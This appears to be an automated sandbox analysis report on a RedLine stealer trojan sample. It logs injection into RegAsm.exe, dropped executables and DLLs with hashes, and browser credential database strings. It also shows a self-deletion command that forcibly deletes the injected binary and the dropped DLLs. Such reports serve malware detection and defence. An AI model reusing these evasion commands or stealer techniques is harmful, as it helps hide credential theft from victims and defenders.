Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80D960	3_2_6C80D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C84B970	3_2_6C84B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86BA90	3_2_6C86BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C824AA0	3_2_6C824AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80CAB0	3_2_6C80CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C862AB0	3_2_6C862AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C838AC0	3_2_6C838AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C811AF0	3_2_6C811AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C839A60	3_2_6C839A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8534A0	3_2_6C8534A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85C4A0	3_2_6C85C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8064C0	3_2_6C8064C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81D4D0	3_2_6C81D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FD4E0	3_2_6C7FD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86542B	3_2_6C86542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C805440	3_2_6C805440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86545C	3_2_6C86545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8585F0	3_2_6C8585F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C820512	3_2_6C820512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85E680	3_2_6C85E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FC670	3_2_6C7FC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8676E3	3_2_6C8676E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C845600	3_2_6C845600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C814640	3_2_6C814640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8477A0	3_2_6C8477A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C837710	3_2_6C837710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8260A0	3_2_6C8260A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8650C7	3_2_6C8650C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81C0E0	3_2_6C81C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83F070	3_2_6C83F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C835190	3_2_6C835190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86B170	3_2_6C86B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83E2F0	3_2_6C83E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F22A0	3_2_6C7F22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F5340	3_2_6C7F5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8653C8	3_2_6C8653C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83D320	3_2_6C83D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80C370	3_2_6C80C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FF380	3_2_6C7FF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C89ECC0	3_2_6C89ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8FECD0	3_2_6C8FECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C966C00	3_2_6C966C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C97AC30	3_2_6C97AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AAC60	3_2_6C8AAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C936D90	3_2_6C936D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8A4DB0	3_2_6C8A4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CA2CDC0	3_2_6CA2CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CA28D20	3_2_6CA28D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9CAD50	3_2_6C9CAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C96ED70	3_2_6C96ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C926E90	3_2_6C926E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AAEC0	3_2_6C8AAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C940EC0	3_2_6C940EC0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\CAFIJKFHIJ.exe 9BFE195AAEE63E17887A211D9C9D88F819E5B49B19FD6DEA1EC020DACBE8B34E
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: String function: 00F62440 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C82CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C8394D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402360 appears 286 times

PE file does not import any functions

Source: Soft123[1].exe.3.dr	Static PE information: No import functions for PE file found
Source: CAFIJKFHIJ.exe.3.dr	Static PE information: No import functions for PE file found

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@16/26@2/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C857030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

3_2_00410AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411020

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\ProgramData\CAFIJKFHIJ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: AKECBFBAEBKJJJJKFCGC.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: mscorjit.dll	Jump to behavior
